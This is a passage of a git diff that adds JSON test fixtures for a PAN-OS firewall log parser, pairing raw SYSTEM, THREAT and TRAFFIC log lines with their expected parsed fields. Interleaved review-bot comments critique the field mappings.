@@ -0,0 +1,43 @@ +{ + "input": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Installed WildFire package: panupv3-all-wildfire-739613-742993.tgz\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:54.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170519,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:54.757000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}" + }, + "expected": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Installed WildFire package: panupv3-all-wildfire-739613-742993.tgz\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:54.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170519,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:54.757000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "module": "WildFire", + "reason": "Installed WildFire package: panupv3-all-wildfire-739613-742993.tgz", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-03T16:45:54Z", + "action": { + "type": "general" + }, + "file": { + "name": "panupv3-all-wildfire-739613-742993.tgz" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": 
"PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json new file mode 100644 index 000000000..2aa5ce29e --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json 
@@ -0,0 +1,40 @@ +{ + "input": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire version 739613-742993 downloaded by Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170516,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.887000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}" + }, + "expected": { + "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire version 739613-742993 downloaded by Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170516,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.887000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}", + "event": { + "category": [ + "host" + ], + "dataset": "system", + "module": "WildFire", + "reason": "WildFire version 739613-742993 downloaded by Auto update agent", + "type": [ + "info" + ] + }, + "@timestamp": "2023-02-03T16:45:52Z", + "action": { + "type": "general" + }, + "host": { + "name": "PA-VM" + }, + "log": { + "level": "Informational", + "logger": "system" + }, + "observer": { + "product": "PAN-OS" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": 
"0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "general" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_threat.json b/Palo Alto Networks/paloalto-prima-access/tests/test_threat.json new file mode 100644 index 000000000..48dc1f1bd --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_threat.json 
@@ -0,0 +1,94 @@ +{ + "input": { + "message": "1,2024/01/12 11:21:15,016201000000,THREAT,url,2562,2024/01/12 11:21:15,1.2.3.4,5.6.7.8,9.10.11.12,0.0.0.0,SAAS vers log,,,ssl,vsys1,Outside,test-Externe,a11.30,a11.25,Panorama,2024/01/12 11:21:15,200000,1,58444,2222,58444,2222,0x50b444,tcp,alert,\"test.fr:9999/\",(9999),test,informational,client-to-server,55555555555555555555,0x8000000000000000,US,France,,,0,,,0,,,,,,,,0,0,0,0,0,,TEST-01,,,,,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"test,low-risk\",96eeeef8-bd9c-4145,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-01-12T11:21:15.190+01:00,,,,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no," + }, + "expected": { + "message": "1,2024/01/12 11:21:15,016201000000,THREAT,url,2562,2024/01/12 11:21:15,1.2.3.4,5.6.7.8,9.10.11.12,0.0.0.0,SAAS vers log,,,ssl,vsys1,Outside,test-Externe,a11.30,a11.25,Panorama,2024/01/12 11:21:15,200000,1,58444,2222,58444,2222,0x50b444,tcp,alert,\"test.fr:9999/\",(9999),test,informational,client-to-server,55555555555555555555,0x8000000000000000,US,France,,,0,,,0,,,,,,,,0,0,0,0,0,,TEST-01,,,,,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"test,low-risk\",96eeeef8-bd9c-4145,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-01-12T11:21:15.190+01:00,,,,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no,", + "event": { + "action": "alert", + "category": [ + "network" + ], + "code": "9999", + "dataset": "threat", + "outcome": "success", + "type": [ + "info" + ] + }, + "@timestamp": "2024-01-12T10:21:15.190000Z", + "action": { + "name": "alert", + "outcome": "success", + "type": "url" + }, + "destination": { + "address": "5.6.7.8", + "domain": "test.fr", + "ip": "5.6.7.8", + "nat": { + "ip": "0.0.0.0", + "port": 2222 + }, + "port": 2222 + }, + "log": { + "hostname": "TEST-01", + "level": "informational", 
+ "logger": "threat" + }, + "network": { + "application": "ssl", + "transport": "tcp" + }, + "observer": { + "name": "TEST-01", + "product": "PAN-OS", + "serial_number": "016201000000" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "url", + "VirtualLocation": "vsys1", + "threat": { + "id": "9999" + } + }, + "related": { + "hosts": [ + "test.fr" + ], + "ip": [ + "0.0.0.0", + "1.2.3.4", + "5.6.7.8", + "9.10.11.12" + ] + }, + "rule": { + "name": "SAAS vers log", + "uuid": "96eeeef8-bd9c-4145" + }, + "source": { + "address": "1.2.3.4", + "geo": { + "country_iso_code": "US" + }, + "ip": "1.2.3.4", + "nat": { + "ip": "9.10.11.12", + "port": 58444 + }, + "port": 58444 + }, + "url": { + "domain": "test.fr", + "port": 9999, + "registered_domain": "test.fr", + "top_level_domain": "fr" + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json b/Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json new file mode 100644 index 000000000..e45d01607 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json 
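Review bot: This fixture cannot distinguish the threat/content ID from the URL port: the `(9999)` threat field and the `test.fr:9999/` port carry the same value, so `event.code`, `paloalto.threat.id` and `url.port` all read `9999` and a mapping that accidentally fed the port into `event.code` (or vice versa) would still pass. Use distinct values in the sample, e.g. `\"test.fr:8443/\",(9999)`, so `url.port` becomes `8443` while `event.code` stays `"9999"`. Separately, `url.domain` and `url.port` are derived from the URL field but `url.original` is not populated; adding `"original": "test.fr:9999/"` (and `"path": "/"`) would keep the raw indicator searchable and is what `related.hosts` consumers usually expect alongside the split fields.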
@@ -0,0 +1,91 @@ +{ + "input": { + "message": "1,2024/08/12 15:57:12,012345678910,THREAT,vulnerability,2561,2024/08/12 15:57:04,1.2.3.4,5.6.7.8,1.2.3.4,5.6.7.8,Access_Portal-GW_GP,,,web-browsing,vsys1,INTERNET,INTERNET,ethernet1/3.302,ethernet1/3.302,default,2024/08/12 15:57:04,113535,1,56731,443,56731,20077,0x81402000,tcp,reset-both,\"login.esp\",Palo Alto Networks GlobalProtect OS Command Injection Vulnerability(95187),business-and-economy,critical,client-to-server,7334683348721844974,0x8000000000000000,United States,France,,,1210223766892439373,,,1,,,,,,,,0,320,90,0,0,,site1-FW01,,,,,0,,0,,N/A,code-execution,AppThreat-8879-8900,0x0,0,4294967295,,,abcdefgh-1234-5678-abcd-01234567890,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-08-12T15:57:04.614+02:00,,,,internet-utility,general-internet,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,web-browsing,no,no,", + "sekoiaio": { + "intake": { + "dialect": "Palo Alto NGFW", + "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd" + } + } + }, + "expected": { + "message": "1,2024/08/12 15:57:12,012345678910,THREAT,vulnerability,2561,2024/08/12 15:57:04,1.2.3.4,5.6.7.8,1.2.3.4,5.6.7.8,Access_Portal-GW_GP,,,web-browsing,vsys1,INTERNET,INTERNET,ethernet1/3.302,ethernet1/3.302,default,2024/08/12 15:57:04,113535,1,56731,443,56731,20077,0x81402000,tcp,reset-both,\"login.esp\",Palo Alto Networks GlobalProtect OS Command Injection Vulnerability(95187),business-and-economy,critical,client-to-server,7334683348721844974,0x8000000000000000,United States,France,,,1210223766892439373,,,1,,,,,,,,0,320,90,0,0,,site1-FW01,,,,,0,,0,,N/A,code-execution,AppThreat-8879-8900,0x0,0,4294967295,,,abcdefgh-1234-5678-abcd-01234567890,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-08-12T15:57:04.614+02:00,,,,internet-utility,general-internet,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,web-browsing,no,no,", + "event": 
{ + "action": "reset-both", + "category": [ + "vulnerability" + ], + "code": "95187", + "dataset": "threat", + "outcome": "success", + "reason": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability", + "type": [ + "info" + ] + }, + "@timestamp": "2024-08-12T13:57:04.614000Z", + "action": { + "name": "reset-both", + "outcome": "success", + "type": "vulnerability" + }, + "destination": { + "address": "5.6.7.8", + "ip": "5.6.7.8", + "nat": { + "ip": "5.6.7.8", + "port": 20077 + }, + "port": 443 + }, + "file": { + "name": "login.esp", + "path": "login.esp" + }, + "log": { + "hostname": "site1-FW01", + "level": "critical", + "logger": "threat" + }, + "network": { + "application": "web-browsing", + "transport": "tcp" + }, + "observer": { + "name": "site1-FW01", + "product": "PAN-OS", + "serial_number": "012345678910" + }, + "paloalto": { + "DGHierarchyLevel1": "320", + "DGHierarchyLevel2": "90", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "vulnerability", + "VirtualLocation": "vsys1", + "threat": { + "id": "95187", + "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability" + } + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "name": "Access_Portal-GW_GP", + "uuid": "abcdefgh-1234-5678-abcd-01234567890" + }, + "source": { + "address": "1.2.3.4", + "ip": "1.2.3.4", + "nat": { + "ip": "1.2.3.4", + "port": 56731 + }, + "port": 56731 + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json new file mode 100644 index 000000000..d2e4e4775 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json 
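Review bot: `event.category` is `["vulnerability"]` for an IPS `vulnerability`-subtype THREAT log whose action is `reset-both`; in ECS, `vulnerability` is the category for vulnerability-scanner findings, while an inline signature match that reset the session fits `intrusion_detection`, and `event.type` would be `denied` rather than `info` once the firewall blocked it. Because the `expected` block mirrors the current parser mapping this is a mapping question rather than a fixture typo, but `event.category: intrusion_detection` is what most detection content for PAN-OS threat logs keys on, so it is worth settling before more fixtures lock the current value in. The URL field `login.esp` is also mapped to `file.name`/`file.path`, yet for a `vulnerability` subtype it is the requested URI of the GlobalProtect portal, not a file on disk; `url.path`/`url.original` would be the truthful home. Finally the `rule.uuid` placeholder `abcdefgh-1234-5678-abcd-01234567890` is not hex and will fail any downstream `uuid` format validation — fine for a fixture, but a valid-looking placeholder avoids that surprise.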
@@ -0,0 +1,41 @@
+{
+ "input": {
+ "message": ": 1,2023/08/01 04:03:24,026701002348,SYSTEM,general,2816,2023/08/01 04:03:24,,general,,0,0,general,informational,\"Request made to server \"\"server_test.com\"\" is successful . \",7261972653022396272,0x8000000000000000,0,0,0,0,,test-01,0,0,2023-08-01T04:03:24.705+02:00"
+ },
+ "expected": {
+ "message": ": 1,2023/08/01 04:03:24,026701002348,SYSTEM,general,2816,2023/08/01 04:03:24,,general,,0,0,general,informational,\"Request made to server \"\"server_test.com\"\" is successful . \",7261972653022396272,0x8000000000000000,0,0,0,0,,test-01,0,0,2023-08-01T04:03:24.705+02:00",
+ "event": {
+ "category": [
+ "host"
+ ],
+ "dataset": "system",
+ "reason": "Request made to server \"server_test.com\" is successful . ",
+ "type": [
+ "info"
+ ]
+ },
+ "@timestamp": "2023-08-01T02:03:24.705000Z",
+ "action": {
+ "name": "general",
+ "type": "general"
+ },
+ "log": {
+ "hostname": "test-01",
+ "level": "informational",
+ "logger": "system"
+ },
+ "observer": {
+ "name": "test-01",
+ "product": "PAN-OS",
+ "serial_number": "026701002348"
+ },
+ "paloalto": {
+ "DGHierarchyLevel1": "0",
+ "DGHierarchyLevel2": "0",
+ "DGHierarchyLevel3": "0",
+ "DGHierarchyLevel4": "0",
+ "EventID": "general",
+ "Threat_ContentType": "general"
+ }
+ }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json
new file mode 100644
index 000000000..c0f834538
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json
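Review bot: The CSV SYSTEM fixture fills `log.hostname`, `observer.name` and `observer.serial_number` from `test-01`/`026701002348` but leaves `host.name` empty, while the JSON SYSTEM fixtures in this series (`test_system_event_*_json.json`) set only `host.name` from `LogSourceName`; the same log type thus lands in different ECS fields depending on the transport format, and a rule on `host.name` sees half the data. I would add `"host": {"name": "test-01"}` here (and the observer fields on the JSON side) so both paths agree. The quoted hostname `server_test.com` inside `event.reason` is also not surfaced in `related.hosts` or `destination.address`, unlike the update-server hostname in test_system_event_7_json.json, so the CSV and JSON extractors for "server" hostnames presumably differ — worth confirming they share one pattern. The leading `: ` on the raw message is tolerated by the parse, which is good to pin as an explicit test-case comment in the file name or a sibling fixture, since that prefix looks like syslog framing residue rather than PAN-OS output.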
@@ -0,0 +1,87 @@ +{ + "input": { + "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": \"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187101,\"SessionDuration\": 
0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17635,\"SessionStartTime\": \"2023-02-03T16:46:00.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:46:07.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:46:07.584000Z\",\"TimeReceived\": \"2023-02-03T16:46:14.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}" + }, + "expected": { + "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": 
\"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187101,\"SessionDuration\": 0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17635,\"SessionStartTime\": \"2023-02-03T16:46:00.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:46:07.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:46:07.584000Z\",\"TimeReceived\": \"2023-02-03T16:46:14.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}", + "event": { + "action": "allow", + "category": [ + "network" + ], + "dataset": "traffic", + "duration": 0, + "outcome": "success", + "start": "2023-02-03T16:46:00Z", + "type": [ + "end" + ] + }, + "@timestamp": 
"2023-02-03T16:46:07Z", + "action": { + "name": "allow", + "outcome": "success", + "type": "end" + }, + "destination": { + "address": "5.6.7.8", + "geo": { + "country_iso_code": "US" + }, + "ip": "5.6.7.8", + "nat": { + "port": 0 + }, + "port": 443 + }, + "log": { + "hostname": "PA-VM", + "logger": "traffic" + }, + "network": { + "application": "incomplete", + "bytes": 74, + "packets": 1 + }, + "observer": { + "egress": { + "interface": { + "alias": "untrusted" + } + }, + "ingress": { + "interface": { + "alias": "untrusted" + } + }, + "name": "PA-VM", + "product": "PAN-OS", + "serial_number": "007954000351998" + }, + "paloalto": { + "DGHierarchyLevel1": "0", + "DGHierarchyLevel2": "0", + "DGHierarchyLevel3": "0", + "DGHierarchyLevel4": "0", + "Threat_ContentType": "end", + "URLCategory": "any", + "VirtualLocation": "vsys1" + }, + "related": { + "ip": [ + "1.2.3.4", + "5.6.7.8" + ] + }, + "rule": { + "name": "intrazone-default", + "uuid": "f903db52-4b89-4610-b908-67be412704f0" + }, + "source": { + "address": "1.2.3.4", + "bytes": 74, + "ip": "1.2.3.4", + "port": 59087 + } + } +} \ No newline at end of file diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json new file mode 100644 index 000000000..cfa92faf3 --- /dev/null +++ b/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json 
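Review bot: `destination.nat.port` is emitted as `0` while `destination.nat.ip` is absent, because `NATDestination` is `""` and `NATDestinationPort` is `0` in the input (no NAT); `NATSource`/`NATSourcePort` carry the same empty/zero values yet `source.nat` is, correctly, not emitted. A bare `nat.port: 0` is a spurious field that matches `destination.nat.port:*` searches, so the expectation (and the mapping behind it) should drop the `nat` object when the NAT address is empty, mirroring the source side. `network.transport` is also missing although `Protocol` is `tcp` in the input and the CSV threat fixtures populate it; I would add `"transport": "tcp"` next to `"application": "incomplete"`. Finally `event.duration: 0` mirrors `SessionDuration`, which PAN-OS reports in seconds, while ECS defines `event.duration` in nanoseconds — a non-zero session would be off by 1e9, so either convert or keep the raw value under `paloalto.*`.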
@@ -0,0 +1,87 @@ +{ + "input": { + "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": \"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187100,\"SessionDuration\": 
0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17634,\"SessionStartTime\": \"2023-02-03T16:45:44.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:45:52.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.582000Z\",\"TimeReceived\": \"2023-02-03T16:45:56.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}" + }, + "expected": { + "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": 